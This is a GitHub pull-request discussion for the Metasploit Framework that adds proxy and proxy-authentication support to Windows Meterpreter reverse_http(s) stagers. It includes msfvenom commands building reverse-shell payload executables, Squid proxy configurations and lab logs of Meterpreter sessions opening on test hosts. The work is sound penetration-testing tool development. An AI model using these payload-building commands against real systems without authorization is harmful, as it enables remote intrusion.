Adds proxy (with authentication) support to reverse_http(s) #4934

hdm · 2015-03-16T05:18:02Z

This patch merges the functionality of reverse_https_proxy into the reverse_http and reverse_https stagers. These have been tested in all four configurations (http-noauth, https-noauth, http-auth, http-noauth) on Windows 8.1 64-bit (WoW64) and Wine on Ubuntu 14.04 x86_64. Note that wine-1.6.4 does not set the user/pass parameters properly in SSL mode (the other cases work).

Test-wise, create four EXEs (http-noauth, https-noauth, http-auth, http-noauth):

$ ./msfvenom -f exe -p windows/meterpreter/reverse_http LHOST=192.168.0.4 LPORT=4444 PayloadProxyHost=192.168.0.4 PayloadProxyPort=3128 -o /scratch/windows_meterpreter_reverse_http_proxy_noauth.exe
$ ./msfvenom -f exe -p windows/meterpreter/reverse_https LHOST=192.168.0.4 LPORT=4444 PayloadProxyHost=192.168.0.4 PayloadProxyPort=3128 -o /scratch/windows_meterpreter_reverse_https_proxy_noauth.exe
$ ./msfvenom -f exe -p windows/meterpreter/reverse_http LHOST=192.168.0.4 LPORT=4444 PayloadProxyHost=192.168.0.4 PayloadProxyPort=3128 PayloadProxyUser=myproxyuser PayloadProxyPass=MyProxyPass -o /scratch/windows_meterpreter_reverse_http_proxy_auth.exe
$ ./msfvenom -f exe -p windows/meterpreter/reverse_https LHOST=192.168.0.4 LPORT=4444 PayloadProxyHost=192.168.0.4 PayloadProxyPort=3128 PayloadProxyUser=myproxyuser PayloadProxyPass=MyProxyPass -o /scratch/windows_meterpreter_reverse_https_proxy_auth.exe

I used Squid on Ubuntu 14.04 with the following configuration in squid.conf (unauthenticated):

auth_param basic program /usr/lib/squid3/basic_ncsa_auth /etc/squid3/passwd
http_access allow all

The following configuration was used in authenticated mode:

auth_param basic program /usr/lib/squid3/basic_ncsa_auth /etc/squid3/passwd
acl password proxy_auth REQUIRED
auth_param basic children 5
auth_param basic realm TESTING
http_access allow password
http_access allow all

The passwd file was created with:

$ htpasswd -c /etc/squid3/passwd myproxyuser
MyProxyPass

Squid has to be restarted between configuration changes.

hdm · 2015-03-16T05:26:30Z

Commit f361e4e will be cleaned up once the existing proxy-aware stagers have been consolidated. For now, it supports both forms of proxy options, but prefers the new style when its available.

hdm · 2015-03-16T05:32:08Z

For testing, note that the multi/handler settings for StageProxy{Host|Port|Type|User|Pass} should match the stager, however disabling the proxy in the handler works just fine as long as the target as direct access back to the Metasploit listener. In this case 192.168.0.4 is both the proxy and the metasploit listener, while 192.168.0.6 is the target. Note that the session IP pair is showing a connection between the listener and the proxy, not the target.

Testing windows_meterpreter_reverse_https_proxy_auth.exe on Windows 8.1:

[*] Started HTTPS reverse handler on https://0.0.0.0:4444/
[*] Starting the payload handler...
[*] 192.168.0.4:51788 Request received for /OYX9m9X75ExXFH5rIb54OkX5HXDRaepda7foiyKUYYDZ4Y4bF4J3JakBywTVLLrPvMv3HIsAD7rzvdcScRvo6wLxG3o9k2vH97ofPrkkkULmhvR1cKGfbdEXj9wZfgrCUqNhKjT1q4A2YAnRIuy84JBNzc2EoABcKdSeRtE4pkvIWfWqIP1Rkj...
[*] 192.168.0.4:51788 Staging connection for target /OYX9m9X75ExXFH5rIb54OkX5HXDRaepda7foiyKUYYDZ4Y4bF4J3JakBywTVLLrPvMv3HIsAD7rzvdcScRvo6wLxG3o9k2vH97ofPrkkkULmhvR1cKGfbdEXj9wZfgrCUqNhKjT1q4A2YAnRIuy84JBNzc2EoABcKdSeRtE4pkvIWfWqIP1Rkj received...
[*] Meterpreter session 1 opened (192.168.0.4:4444 -> 192.168.0.4:51788) at 2015-03-16 00:21:42 -0500

meterpreter > sysinfo
Computer        : Z420
OS              : Windows 8 (Build 9200).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32

Corresponding squid log shows the metsrv.dll and stdapi downloads:

1426483301.738      0 192.168.0.6 TCP_DENIED/407 3565 CONNECT 192.168.0.4:4444 - HIER_NONE/- text/html
1426483302.167    429 192.168.0.6 TCP_MISS/200 773140 CONNECT 192.168.0.4:4444 myproxyuser HIER_DIRECT/192.168.0.4 -
1426483302.191      4 192.168.0.6 TCP_MISS/200 278 CONNECT 192.168.0.4:4444 myproxyuser HIER_DIRECT/192.168.0.4 -
1426483302.243     50 192.168.0.6 TCP_MISS/200 278 CONNECT 192.168.0.4:4444 myproxyuser HIER_DIRECT/192.168.0.4 -
1426483302.260      2 192.168.0.6 TCP_MISS/200 278 CONNECT 192.168.0.4:4444 myproxyuser HIER_DIRECT/192.168.0.4 -
1426483302.292      3 192.168.0.6 TCP_MISS/200 174850 CONNECT 192.168.0.4:4444 myproxyuser HIER_DIRECT/192.168.0.4 -
1426483302.296      2 192.168.0.6 TCP_MISS/200 278 CONNECT 192.168.0.4:4444 myproxyuser HIER_DIRECT/192.168.0.4 -

Testing windows_meterpreter_reverse_http_proxy_auth.exe on Windows 8.1:

[*] Started HTTP reverse handler on http://0.0.0.0:4444/
[*] Starting the payload handler...
[*] 192.168.0.4:51949 Request received for /BKuusNi15UOCbq8lS4MmSWfkskOslbeVVj6jKBnoBZedeGyoz8dT7A49pvZs2qOjUMOQR31SVQCM1CpsLB4ZxprZ0OyS34MFj5np7pOEojskf3xttSVjF1NoJ2ypmygYI...
[*] 192.168.0.4:51949 Staging connection for target /BKuusNi15UOCbq8lS4MmSWfkskOslbeVVj6jKBnoBZedeGyoz8dT7A49pvZs2qOjUMOQR31SVQCM1CpsLB4ZxprZ0OyS34MFj5np7pOEojskf3xttSVjF1NoJ2ypmygYI received...
[*] Meterpreter session 1 opened (192.168.0.4:4444 -> 192.168.0.4:51949) at 2015-03-16 00:27:55 -0500

meterpreter > sysinfo
Computer        : Z420
OS              : Windows 8 (Build 9200).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32

Corresponding squid log shows the metsrv.dll and stdapi downloads:

1426483674.538      0 192.168.0.6 TCP_DENIED/407 4074 GET http://192.168.0.4:4444/BKuusNi15UOCbq8lS4MmSWfkskOslbeVVj6jKBnoBZedeGyoz8dT7A49pvZs2qOjUMOQR31SVQCM1CpsLB4ZxprZ0OyS34MFj5np7pOEojskf3xttSVjF1NoJ2ypmygYI - HIER_NONE/- text/html
1426483675.026    487 192.168.0.6 TCP_MISS/200 770302 GET http://192.168.0.4:4444/BKuusNi15UOCbq8lS4MmSWfkskOslbeVVj6jKBnoBZedeGyoz8dT7A49pvZs2qOjUMOQR31SVQCM1CpsLB4ZxprZ0OyS34MFj5np7pOEojskf3xttSVjF1NoJ2ypmygYI myproxyuser HIER_DIRECT/192.168.0.4 application/octet-stream
1426483675.046      1 192.168.0.6 TCP_MISS/200 249 POST http://192.168.0.4:4444/0yjO_35Y6gBrfQ7ckkMxo/ myproxyuser HIER_DIRECT/192.168.0.4 application/octet-stream
1426483675.093     46 192.168.0.6 TCP_MISS/200 249 POST http://192.168.0.4:4444/0yjO_35Y6gBrfQ7ckkMxo/ myproxyuser HIER_DIRECT/192.168.0.4 application/octet-stream
1426483675.108      1 192.168.0.6 TCP_MISS/200 249 POST http://192.168.0.4:4444/0yjO_35Y6gBrfQ7ckkMxo/ myproxyuser HIER_DIRECT/192.168.0.4 application/octet-stream
1426483675.141      2 192.168.0.6 TCP_MISS/200 174531 POST http://192.168.0.4:4444/0yjO_35Y6gBrfQ7ckkMxo/ myproxyuser HIER_DIRECT/192.168.0.4 application/octet-stream
1426483675.143      1 192.168.0.6 TCP_MISS/200 249 POST http://192.168.0.4:4444/0yjO_35Y6gBrfQ7ckkMxo/ myproxyuser HIER_DIRECT/192.168.0.4 application/octet-stream

The same tests work without authentication once the proxy has been reconfigured to allow it.

bcook-r7 · 2015-03-16T16:05:40Z

It's a little confusing, transitioning from PROXYHOST -> PROXY_HOST -> StagerProxyHost. Is this implying that there may be a different proxy host param for the payload?

hdm · 2015-03-16T16:18:19Z

The Stager prefix may need to be Payload instead, right now we have namespace conflicts between the exploit/auxiliary modules and the payload in some cases, which is why SSLCert became HandlerSSLCert. Would Payload make more sense? These would end up being shared with the payloads themselves (meterpreter etc).

jlee-r7 · 2015-03-16T16:58:27Z

I think Payload makes more sense. Possibly even Payload:: since we have that sort of namespace for other things as well. PROXY_HOST has potential confusion with Proxies used for aggressive exploits.

hdm · 2015-03-16T17:20:24Z

Updated to PayloadProxy{Host|Port|Type|User|Pass}

jlee-r7 · 2015-03-16T17:37:14Z

lib/msf/core/payload/windows/reverse_http.rb

-    #   host:     [hostname]
-    #   port:     [port]
-    # exitfunk:   [process|thread|seh|sleep]
+    #        ssl: (true|false)


These should all be yard comments for the method, e.g.:

# @option opts [Bool] :ssl # @option opts [String] :url

Note that StagerRetryCount is not defined here, but will be in the parent class once rapid7#4934 lands

hdm · 2015-03-18T06:35:45Z

This needs a rebase once #4295 is landed

hdm · 2015-03-18T06:45:29Z

Squid configuration (/etc/squid3/squid.conf) on Ubuntu 14.04:

auth_param basic program /usr/lib/squid3/basic_ncsa_auth /etc/squid3/passwd
acl localnet src 0.0.0.0/0
acl password proxy_auth REQUIRED
auth_param basic children 5
auth_param basic realm TESTING
http_access allow password
http_access allow all
http_access allow localnet
http_access deny all
http_port 3128
coredump_dir /var/spool/squid3
refresh_pattern ^ftp:       1440    20% 10080
refresh_pattern ^gopher:    1440    0%  1440
refresh_pattern -i (/cgi-bin/|\?) 0 0%  0
refresh_pattern (Release|Packages(.gz)*)$      0

To make this unauthenticated:

# auth_param basic program /usr/lib/squid3/basic_ncsa_auth /etc/squid3/passwd
# acl password proxy_auth REQUIRED
# auth_param basic children 5
# auth_param basic realm TESTING
# http_access allow password
acl localnet src 0.0.0.0/0
http_access allow all
http_access allow localnet
http_access deny all
http_port 3128
coredump_dir /var/spool/squid3
refresh_pattern ^ftp:       1440    20% 10080
refresh_pattern ^gopher:    1440    0%  1440
refresh_pattern -i (/cgi-bin/|\?) 0 0%  0
refresh_pattern (Release|Packages(.gz)*)$      0

Create a user/pass with:

# htpasswd -c /etc/squid3/passwd myproxyuser
MyProxyPass

OJ · 2015-03-18T06:53:02Z

@hmoore-r7 #4295 now landed. Over to you for fun rebasing shenanigans.

OJ · 2015-03-18T07:10:22Z

FWIW, this is my configuration that I used on Fedora 21 x64 (in case anyone else is interested)

auth_param basic program /usr/lib64/squid/basic_ncsa_auth /etc/squid/passwd
acl localnet src 0.0.0.0/0
acl password proxy_auth REQUIRED
auth_param basic children 5
auth_param basic realm MSF
http_access allow password
http_access allow all
http_access allow localnet
http_access deny all
http_port 3128
coredump_dir /tmp
refresh_pattern ^ftp:       1440    20% 10080
refresh_pattern ^gopher:    1440    0%  1440
refresh_pattern -i (/cgi-bin/|\?) 0 0%  0
#refresh_pattern (Release|Packages(.gz)*)$      0   <~ this causes failure for some reason

OJ · 2015-03-18T07:26:47Z

Proxy host is 10.1.10.40, victim is 10.1.10.38

HTTP auth

msf exploit(handler) > run

[*] Started HTTP reverse handler on http://0.0.0.0:8000/
[*] Starting the payload handler...
[*] 10.1.10.40:43054 Request received for /JTkkGWEd33sqgK4NO5MbrgxPqe7Z5fM...
[*] 10.1.10.40:43054 Staging connection for target /JTkkGWEd33sqgK4NO5MbrgxPqe7Z5fM received...
[*] Meterpreter session 1 opened (10.1.10.33:8000 -> 10.1.10.40:43054) at 2015-03-18 17:19:56 +1000

meterpreter > getuid
Server username: CORELAN\oj
meterpreter > sysinfo
Computer        : CORELAN
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_AU
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.1.10.38 - Meterpreter session 1 closed.  Reason: User exit

HTTPS auth

msf exploit(handler) > run

[*] Started HTTPS reverse handler on https://0.0.0.0:8000/
[*] Starting the payload handler...
[*] 10.1.10.40:43157 Request received for /nBgrQkJteYttu3jV7hHpfyZLrCcITWnu3Jxz1HjaJgm3pDM2gENfiOFWbQzGTW7QLuUWfiLART2XRdrVWhWYIx3O3dpWBJ5yMzpYw4dKPOejxwBhiBo7b99xknpN8KRPFo2LmlYpzRg83CnwUZ4L4nQ58Bh8nMkmC...
[*] 10.1.10.40:43157 Staging connection for target /nBgrQkJteYttu3jV7hHpfyZLrCcITWnu3Jxz1HjaJgm3pDM2gENfiOFWbQzGTW7QLuUWfiLART2XRdrVWhWYIx3O3dpWBJ5yMzpYw4dKPOejxwBhiBo7b99xknpN8KRPFo2LmlYpzRg83CnwUZ4L4nQ58Bh8nMkmC received...
[*] Meterpreter session 1 opened (10.1.10.33:8000 -> 10.1.10.40:43157) at 2015-03-18 17:22:52 +1000

meterpreter > getuid
Server username: CORELAN\oj
meterpreter > sysinfo
Computer        : CORELAN
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_AU
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.1.10.38 - Meterpreter session 1 closed.  Reason: User exit

HTTPS noauth

msf exploit(handler) > run

[*] Started HTTPS reverse handler on https://0.0.0.0:8000/
[*] Starting the payload handler...
[*] 10.1.10.40:43240 Request received for /ruLwrmOkdaxWJ5f9oo5HP15IGS224u6n03QXNVE9UAKWwGjbiSf8K966FAK1E0s0Qr0cqngaw0xg6xwtq9IQReSuy4RbNTKUFHLMW4nfxIrqH0WjiLVAHpkjTFaQXbrrDSWDChl9qLuX54N2b8u7Be8t7...
[*] 10.1.10.40:43240 Staging connection for target /ruLwrmOkdaxWJ5f9oo5HP15IGS224u6n03QXNVE9UAKWwGjbiSf8K966FAK1E0s0Qr0cqngaw0xg6xwtq9IQReSuy4RbNTKUFHLMW4nfxIrqH0WjiLVAHpkjTFaQXbrrDSWDChl9qLuX54N2b8u7Be8t7 received...
[*] Meterpreter session 2 opened (10.1.10.33:8000 -> 10.1.10.40:43240) at 2015-03-18 17:24:54 +1000

meterpreter > getuid
Server username: CORELAN\oj
meterpreter > sysinfo
Computer        : CORELAN
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_AU
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.1.10.38 - Meterpreter session 2 closed.  Reason: User exit

HTTP noauth

msf exploit(handler) > run

[*] Started HTTP reverse handler on http://0.0.0.0:8000/
[*] Starting the payload handler...
[*] 10.1.10.40:43312 Request received for /inJ1IBNBbtefevix4vOSNrfcrysM2ybSN3kER4V1aEqNO2a6HQBc8rwNiWTG8PaUX35Kb98Ilz9YSuTxyMHPnpGnrVGOxEMC0gcZqvuUViK6taMV6OdHXv3Iu5...
[*] 10.1.10.40:43312 Staging connection for target /inJ1IBNBbtefevix4vOSNrfcrysM2ybSN3kER4V1aEqNO2a6HQBc8rwNiWTG8PaUX35Kb98Ilz9YSuTxyMHPnpGnrVGOxEMC0gcZqvuUViK6taMV6OdHXv3Iu5 received...
[*] Meterpreter session 1 opened (10.1.10.33:8000 -> 10.1.10.40:43312) at 2015-03-18 17:26:14 +1000

meterpreter > getuid
Server username: CORELAN\oj
meterpreter > sysinfo
Computer        : CORELAN
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_AU
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.1.10.38 - Meterpreter session 1 closed.  Reason: User exit

Looks good!

OJ · 2015-03-18T07:28:51Z

Had a fiddle with each for general usage and didn't see any issues. The initial connection comes from the proxy (10.1.10.40):

[*] Meterpreter session 1 opened (10.1.10.33:8000 -> 10.1.10.40:43312) at 2015-03-18 17:26:14 +1000

But MSF sees the IP behind the scenes correctly:

[*] 10.1.10.38 - Meterpreter session 1 closed.  Reason: User exit

Nice work @hmoore-r7. Landing now.

@jakxx

Squashed commit of the following: commit 1dcad7c Merge: 1a2f35d 35d29f5 Author: OJ <oj@buffered.io> Date: Thu Mar 19 14:43:27 2015 +1000 Land rapid7#4953 : Updated POSIX meterpreter binaries commit 35d29f5 Author: Brent Cook <bcook@rapid7.com> Date: Wed Mar 18 22:57:03 2015 -0500 update linux meterpreter bins commit 1a2f35d Merge: 076f15f 346b1d5 Author: OJ <oj@buffered.io> Date: Thu Mar 19 12:41:20 2015 +1000 Land rapid7#4951: Dynamic URI generation for Java/Python reverse_http(s) commit 076f15f Merge: b33e7f4 3f8ed56 Author: Spencer McIntyre <zeroSteiner@gmail.com> Date: Wed Mar 18 20:59:54 2015 -0400 Land rapid7#4792 @jakxx Publish It PUI file exploit commit 3f8ed56 Author: Spencer McIntyre <zeroSteiner@gmail.com> Date: Wed Mar 18 20:57:58 2015 -0400 Add available space to the payload info commit b33e7f4 Merge: 0d1f205 5dd718e Author: joev <joev@metasploit.com> Date: Wed Mar 18 17:17:34 2015 -0500 Land rapid7#4947, h0ng10's TWiki exploit. commit 346b1d5 Author: HD Moore <hd_moore@rapid7.com> Date: Wed Mar 18 16:24:01 2015 -0500 Revert Java back to static size for cache purposes (less cpu usage on startup) commit 33bbf7c Author: HD Moore <hd_moore@rapid7.com> Date: Wed Mar 18 16:08:11 2015 -0500 Dynamic URI generation for python/java http(s) stagers commit 0d1f205 Merge: e943cb5 dab4333 Author: HD Moore <hd_moore@rapid7.com> Date: Wed Mar 18 15:31:22 2015 -0500 Lands rapid7#4949 which fixes rapid7#4845 commit dab4333 Author: rwhitcroft <rw81junk@gmail.com> Date: Wed Mar 18 16:07:46 2015 -0400 updated asm in block commit 7ae9739 Author: rwhitcroft <rw81junk@gmail.com> Date: Wed Mar 18 15:34:31 2015 -0400 fix x64/reverse_https stager shellcode commit e943cb5 Merge: d152c41 d1a2f58 Author: OJ <oj@buffered.io> Date: Wed Mar 18 22:34:52 2015 +1000 Land rapid7#4585 : CVE-2015-0975 XXE in OpenNMS commit d1a2f58 Author: OJ <oj@buffered.io> Date: Wed Mar 18 22:17:44 2015 +1000 Fix of regex for file capture and format tweaks commit 5dd718e Author: Hans-Martin Münch (h0ng10) <muench@mogwaisecurity.de> Date: Wed Mar 18 09:51:51 2015 +0100 Better description commit 00de437 Author: Hans-Martin Münch (h0ng10) <muench@mogwaisecurity.de> Date: Wed Mar 18 09:45:08 2015 +0100 Initial commit commit fa72423 Author: OJ <oj@buffered.io> Date: Wed Mar 18 18:18:54 2015 +1000 Move the module to the correct location commit d152c41 Merge: b46e5f8 b62da42 Author: OJ <oj@buffered.io> Date: Wed Mar 18 17:42:19 2015 +1000 Land rapid7#4934 : Proxy and auth support in reverse_http(s) commit b62da42 Merge: c607cf7 b46e5f8 Author: HD Moore <hd_moore@rapid7.com> Date: Wed Mar 18 01:51:15 2015 -0500 Merge branch 'master' into feature/add-proxies-to-wininet commit b46e5f8 Merge: bd4738b 97def50 Author: OJ <oj@buffered.io> Date: Wed Mar 18 16:49:13 2015 +1000 Land rapid7#4295 : Refactory proxy-enabled payload handling commit c607cf7 Merge: 0513852 bd4738b Author: HD Moore <hd_moore@rapid7.com> Date: Wed Mar 18 01:45:44 2015 -0500 Merging master commit 97def50 Author: HD Moore <hd_moore@rapid7.com> Date: Wed Mar 18 01:26:59 2015 -0500 Whitespace cleanup commit 8d3cb8b Author: HD Moore <hd_moore@rapid7.com> Date: Wed Mar 18 01:25:42 2015 -0500 Fix up meterpreter patching arguments and names commit ef443c8 Author: HD Moore <hd_moore@rapid7.com> Date: Wed Mar 18 01:21:53 2015 -0500 Fix overgreed search/replace commit 390a704 Author: HD Moore <hd_moore@rapid7.com> Date: Wed Mar 18 01:19:05 2015 -0500 Cleanup proxyhost/proxyport arguments to match new names commit f7a06d8 Author: HD Moore <hd_moore@rapid7.com> Date: Wed Mar 18 01:15:32 2015 -0500 Rework PROXY_{HOST|PORT|TYPE|USERNAME|PASSWORD) to the new syntax commit 3aa8cb6 Author: HD Moore <hd_moore@rapid7.com> Date: Wed Mar 18 01:08:09 2015 -0500 Fix two use cases of PROXYHOST/PROXYPORT commit 87a4899 Author: HD Moore <hd_moore@rapid7.com> Date: Mon Dec 15 14:48:09 2014 -0600 Place an IPv6 proxy IP between brackets commit 259db26 Author: HD Moore <hd_moore@rapid7.com> Date: Tue Dec 2 15:36:14 2014 -0600 Remove user/pass and invalid class from the options commit 2ab14e7 Author: HD Moore <hd_moore@rapid7.com> Date: Wed Mar 18 01:01:10 2015 -0500 Adds IPv6 and option-related issues with the previous patch commit 0601946 Author: HD Moore <hd_moore@rapid7.com> Date: Tue Dec 2 13:29:39 2014 -0600 Don't mandate and default PROXY_HOST (miscopy from the proxy stager) commit a4df6d5 Author: HD Moore <hd_moore@rapid7.com> Date: Wed Mar 18 00:59:59 2015 -0500 Cleanup proxy handling code (consistency & bugs) One subtle bug was that each time a request was received, a null byte was being appended to the datastore options for PROXY_USERNAME and PROXY_PASSWORD. Eventually this would break new sessions. This change centralizes the proxy configuration and cleans up the logic. commit 85fb534 Author: HD Moore <hd_moore@rapid7.com> Date: Tue Dec 2 12:57:30 2014 -0600 Fix up the offset detection again, cleanup redundant code commit 2f13988 Author: HD Moore <hd_moore@rapid7.com> Date: Tue Dec 2 12:33:53 2014 -0600 Use OptPort vs OptInt and cleanup the description commit a01be36 Author: HD Moore <hd_moore@rapid7.com> Date: Wed Mar 18 00:59:13 2015 -0500 Rework PROXYHOST/PROXYPORT to PROXY_HOST/PROXY_PORT This also cleans up the windows reverse_https_proxy stager. commit b197b7a Author: jakxx <jakx.ppr@gmail.com> Date: Tue Mar 17 19:24:13 2015 -0400 Additional Updates -Removed unused mixin -Cleaned up Module name -Cleaned up author name commit bd4738b Merge: 47a7f99 d7fa0ec Author: James Lee <egypt@metasploit.com> Date: Tue Mar 17 17:37:55 2015 -0500 Land rapid7#4827, capture and nbns fixups commit d7fa0ec Author: James Lee <egypt@metasploit.com> Date: Tue Mar 17 17:36:45 2015 -0500 Let IPAddr#hton do the calculating commit 47a7f99 Merge: d1d6378 5fd3637 Author: Brent Cook <bcook@rapid7.com> Date: Tue Mar 17 16:22:46 2015 -0500 Land rapid7#4930, @hmoore-r7 winhttp stager certificate check commit 085e6cc Author: jakxx <jakx.ppr@gmail.com> Date: Tue Mar 17 16:39:56 2015 -0400 Implemented Recommended Changes -corrected spelling error -set only option to required -dumped header data to included file -Used Rex for jmp values commit 0490af8 Author: jstnkndy <jstnkndy@gmail.com> Date: Tue Mar 17 10:20:22 2015 -0400 Added error checks, randomness, and uuid delimeter commit f3fc400 Author: jstnkndy <jstnkndy@gmail.com> Date: Tue Mar 17 10:19:40 2015 -0400 typo commit b92d243 Merge: e0a7f53 766a07a Author: jstnkndy <jstnkndy@gmail.com> Date: Tue Mar 17 10:18:32 2015 -0400 Merge branch 'module-cve-2015-0975' of https://github.com/jstnkndy/metasploit-framework into module-cve-2015-0975 commit e0a7f53 Author: jstnkndy <jstnkndy@gmail.com> Date: Tue Mar 17 10:10:51 2015 -0400 Added error checking, randomness, uuid delimiters commit 2ea9844 Author: HD Moore <hd_moore@rapid7.com> Date: Mon Mar 16 14:08:01 2015 -0500 while(true)->loop, use thread.join commit 5fd3637 Author: HD Moore <hd_moore@rapid7.com> Date: Mon Mar 16 14:00:51 2015 -0500 Remove the i32 size specifier (not needed) commit 69d9280 Author: HD Moore <hd_moore@rapid7.com> Date: Mon Mar 16 13:52:13 2015 -0500 Fix yard docs, retries, push.i8 instructions. See commit 0513852 Note that StagerRetryCount is not defined here, but will be in the parent class once rapid7#4934 lands commit 0513852 Author: HD Moore <hd_moore@rapid7.com> Date: Mon Mar 16 13:35:36 2015 -0500 Fix yard docs, fix retries, trim bytes, retested and working commit 69a808b Author: HD Moore <hd_moore@rapid7.com> Date: Mon Mar 16 12:14:42 2015 -0500 StagerProxy -> PayloadProxy commit f361e4e Author: HD Moore <hd_moore@rapid7.com> Date: Mon Mar 16 00:22:10 2015 -0500 Prefer the new-style proxy datastore options when available commit 7e89281 Author: HD Moore <hd_moore@rapid7.com> Date: Mon Mar 16 00:03:31 2015 -0500 Adds proxy (with authentication) support to reverse_http(s) commit 8e37342 Author: HD Moore <hd_moore@rapid7.com> Date: Sat Mar 14 16:52:04 2015 -0500 Comment typo commit 0d12ca4 Author: HD Moore <hd_moore@rapid7.com> Date: Sat Mar 14 16:19:13 2015 -0500 Work around lack of option normalization during size calculation commit 03019cf Author: HD Moore <hd_moore@rapid7.com> Date: Sat Mar 14 15:53:21 2015 -0500 Adds StagerVerifySSLCert support (SHA1 of HandlerSSLCert) commit 1159380 Author: HD Moore <hd_moore@rapid7.com> Date: Sat Mar 14 15:52:23 2015 -0500 Move X509 PEM parsing into Rex::Parser::X509Certificate commit 1001061 Author: HD Moore <hd_moore@rapid7.com> Date: Wed Mar 4 18:52:18 2015 -0600 Initialize @capture_count commit 1b1716b Author: HD Moore <hd_moore@rapid7.com> Date: Sun Feb 22 22:01:01 2015 -0600 Fix a handful of bugs that broke this modules. Fixes rapid7#4799 commit 9730a16 Author: HD Moore <hd_moore@rapid7.com> Date: Sun Feb 22 22:00:42 2015 -0600 Small cleanups to the LLMR responder module commit bdd5276 Author: HD Moore <hd_moore@rapid7.com> Date: Sun Feb 22 21:53:47 2015 -0600 This fixes a number of issues with the Capture mixin * The use of www.metasploit.com in a datastore option results in a DNS lookup (infoleak). Switch to 8.8.8.8 (TTL=1) * The hackey code around #each_packet is no longer necessary in newer Ruby versions * The arp()/probe_gateway() calls to inject_reply() had broken logic leading to early exit and missed replies * The arp() function now tries up to three times to get a reply (helpful with lossy L2) * GC.start is extraneous and should be removed * Increased timeouts commit 615d71d Author: HD Moore <hd_moore@rapid7.com> Date: Sun Feb 22 21:51:33 2015 -0600 Remove extraneous calls to GC.start() commit 44a7e7e Author: jakxx <jakx.ppr@gmail.com> Date: Wed Feb 18 13:22:54 2015 -0500 publish-it fileformat exploit commit 766a07a Author: jstnkndy <jstnkndy@gmail.com> Date: Tue Jan 13 22:08:08 2015 -0500 Add CVE-2015-0975 XXE for OpenNMS <= 14.0.2

Adds proxy (with authentication) support to reverse_http(s)

7e89281

hdm added the payload label Mar 16, 2015

Prefer the new-style proxy datastore options when available

f361e4e

hdm mentioned this pull request Mar 16, 2015

Comprehensively refactor Windows reverse_http stagers #4895

Open

19 tasks

hdm assigned bcook-r7 Mar 16, 2015

bcook-r7 mentioned this pull request Mar 16, 2015

Rebase #4295 on latest master (PROXY settings refactor) #4935

Closed

StagerProxy -> PayloadProxy

69a808b

jlee-r7 reviewed Mar 16, 2015
View reviewed changes

Fix yard docs, fix retries, trim bytes, retested and working

0513852

hdm pushed a commit to hdm/metasploit-framework that referenced this pull request Mar 16, 2015

Fix yard docs, retries, push.i8 instructions. See commit 0513852

69d9280

Note that StagerRetryCount is not defined here, but will be in the parent class once rapid7#4934 lands

HD Moore added 2 commits March 18, 2015 01:45

Merging master

c607cf7

Merge branch 'master' into feature/add-proxies-to-wininet

b62da42

OJ assigned OJ and unassigned bcook-r7 Mar 18, 2015

OJ merged commit b62da42 into rapid7:master Mar 18, 2015

OJ added a commit that referenced this pull request Mar 18, 2015

Land #4934 : Proxy and auth support in reverse_http(s)

d152c41

OJ mentioned this pull request Apr 1, 2015

Fix up WinHTTP proxy implementation rapid7/meterpreter#143

Merged

1 task

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Adds proxy (with authentication) support to reverse_http(s) #4934

Adds proxy (with authentication) support to reverse_http(s) #4934

hdm commented Mar 16, 2015

hdm commented Mar 16, 2015

hdm commented Mar 16, 2015

bcook-r7 commented Mar 16, 2015

hdm commented Mar 16, 2015

jlee-r7 commented Mar 16, 2015

hdm commented Mar 16, 2015

jlee-r7 Mar 16, 2015

hdm commented Mar 18, 2015

hdm commented Mar 18, 2015

OJ commented Mar 18, 2015

OJ commented Mar 18, 2015

OJ commented Mar 18, 2015

OJ commented Mar 18, 2015

Adds proxy (with authentication) support to reverse_http(s) #4934

Adds proxy (with authentication) support to reverse_http(s) #4934

Conversation

hdm commented Mar 16, 2015

hdm commented Mar 16, 2015

hdm commented Mar 16, 2015

bcook-r7 commented Mar 16, 2015

hdm commented Mar 16, 2015

jlee-r7 commented Mar 16, 2015

hdm commented Mar 16, 2015

jlee-r7 Mar 16, 2015

Choose a reason for hiding this comment

hdm commented Mar 18, 2015

hdm commented Mar 18, 2015

OJ commented Mar 18, 2015

OJ commented Mar 18, 2015

OJ commented Mar 18, 2015

HTTP auth

HTTPS auth

HTTPS noauth

HTTP noauth

OJ commented Mar 18, 2015